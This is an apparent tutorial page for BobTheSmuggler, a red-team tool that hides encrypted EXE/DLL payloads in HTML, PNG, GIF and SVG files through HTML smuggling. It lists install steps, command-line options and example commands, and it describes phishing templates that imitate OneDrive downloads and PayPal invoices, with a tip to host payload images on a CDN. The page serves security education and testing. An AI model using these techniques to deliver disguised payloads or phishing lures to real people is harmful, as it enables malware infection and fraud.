BobTheSmuggler is a powerful tool designed for embedding payloads (e.g., EXE/DLL files) into HTML, PNG, GIF, and SVG formats using advanced obfuscation techniques.
This guide will walk you through its features, usage, and setup, helping you understand how to leverage it for educational purposes.
Overview
BobTheSmuggler utilizes HTML Smuggling Attacks to create HTML files with embedded 7z/zip archives. These archives are XOR-encrypted and concealed within image files (PNG/GIF), making them highly stealthy and difficult to detect.
The embedded JavaScript in the HTML file handles the extraction and decryption process, delivering the payload seamlessly.
Supported Payload Delivery Chains
BobTheSmuggler supports multiple delivery chains for embedding EXE/DLL files:
-
.EXE/.DLL → .7z/.Zip (Password Protected) → .JS → .HTML
-
.EXE/.DLL → .7z/.Zip (Password Protected) → .JS → .SVG → .HTML
-
.EXE/.DLL → .7z/.Zip (Password Protected) → .PNG/.GIF → .JS → .HTML
-
.EXE/.DLL → .7z/.Zip (Password Protected) → .PNG/.GIF → JS → .SVG → .HTML
Key Features
-
Stealthy File Concealment: Securely embed EXE/DLL files within HTML pages, PNG, GIF, and SVG formats.
-
Versatile Embedding: Supports various formats to meet different use cases.
-
Advanced Obfuscation: Uses sophisticated techniques to reduce detectability.
-
Custom Templates: Allows the use of personalized HTML/SVG templates for embedding.
-
User-Friendly Interface: Command-line interface designed for both technical and non-technical users.
-
Visual Validation: Offers visualization tools to confirm successful embedding in PNG files.
Installation
Before installing BobTheSmuggler, ensure you have the required dependencies installed:
Pre-requisites
Run the following command to install the required Python libraries:
pip install python-magic py7zr pyminizip
Note: Installing python-magic requires the libmagic library on your system. Follow the instructions on the [python-magic documentation] to install it.
Installing BobTheSmuggler
Clone the repository and navigate to the project directory:
git clone https://github.com/TheCyb3rAlpha/BobTheSmuggler.git
cd BobTheSmuggler
Usage
Once installed, you can execute BobTheSmuggler using the following command:
python3 BobTheSmuggler.py -h
This will display all available options and arguments for using the tool.
Command-Line Options
|
Argument |
Description |
|
-i EXE_FILE |
Path to the EXE/DLL file to embed. |
|
-p PASSWORD |
Password for compression (optional). |
|
-f OUTPUT_HTML |
Name of the output HTML file. |
|
-o OUTPUT_FILENAME |
Name of the downloaded payload file. |
|
-t {html,svg,png,gif} |
Type of embedded template (e.g., HTML or PNG). |
|
-c {7z,zip} |
Compression format (default: zip). |
|
-u PNG_URL |
URL for hosting the embedded PNG image. |
|
-png PNG_FILE |
Path to a custom PNG file for embedding. |
|
-gif GIF_FILE |
Path to a custom GIF file for embedding. |
|
-e CUSTOM_FILE |
Custom HTML/SVG template for embedding. |
|
-v |
Enable verbose logging for detailed output. |
Examples
Here are some practical examples of how you can use BobTheSmuggler:
1. Embed Payload in HTML
To compress an executable (SharpHound.exe) into a password-protected 7z archive and embed it in an HTML file:
python3 BobTheSmuggler.py -i path/to/SharpHound.exe -p 123456 -c 7z -f SharpHound.html -o SharpHound.7z -t html
2. Embed Payload Inside a PNG File
To create an HTML file with a payload hidden inside a PNG image:
python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t png test.png
Note: For testing purposes, you can use the included Flask app (app.py) to host your PNG/GIF files locally on localhost:8000. For production use, host these files on a CDN.
3. Embed Payload Inside a GIF File
To embed a payload inside a GIF file:
python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t gif test.gif
4. Complex Chain with SVG
For more advanced delivery chains involving SVG templates:
python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t svg -e <Custom_SVG_Template>
Templates
BobTheSmuggler includes pre-built templates inspired by real-world attack mechanisms:
-
OneDrive Download Template: Mimics OneDrive download pages used in malware delivery campaigns.
-
PayPal Fake Invoice Template: Simulates phishing emails with fake PayPal invoices.
Disclaimer
BobTheSmuggler is intended solely for educational purposes to promote learning about cybersecurity concepts and techniques. Any misuse of this tool beyond its educational intent is strictly discouraged, and users bear full responsibility for their actions.
By following this guide, you can explore how BobTheSmuggler works while adhering to ethical practices in cybersecurity research! You can learn more and Download BobTheSmuggler in GitHub.
Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here
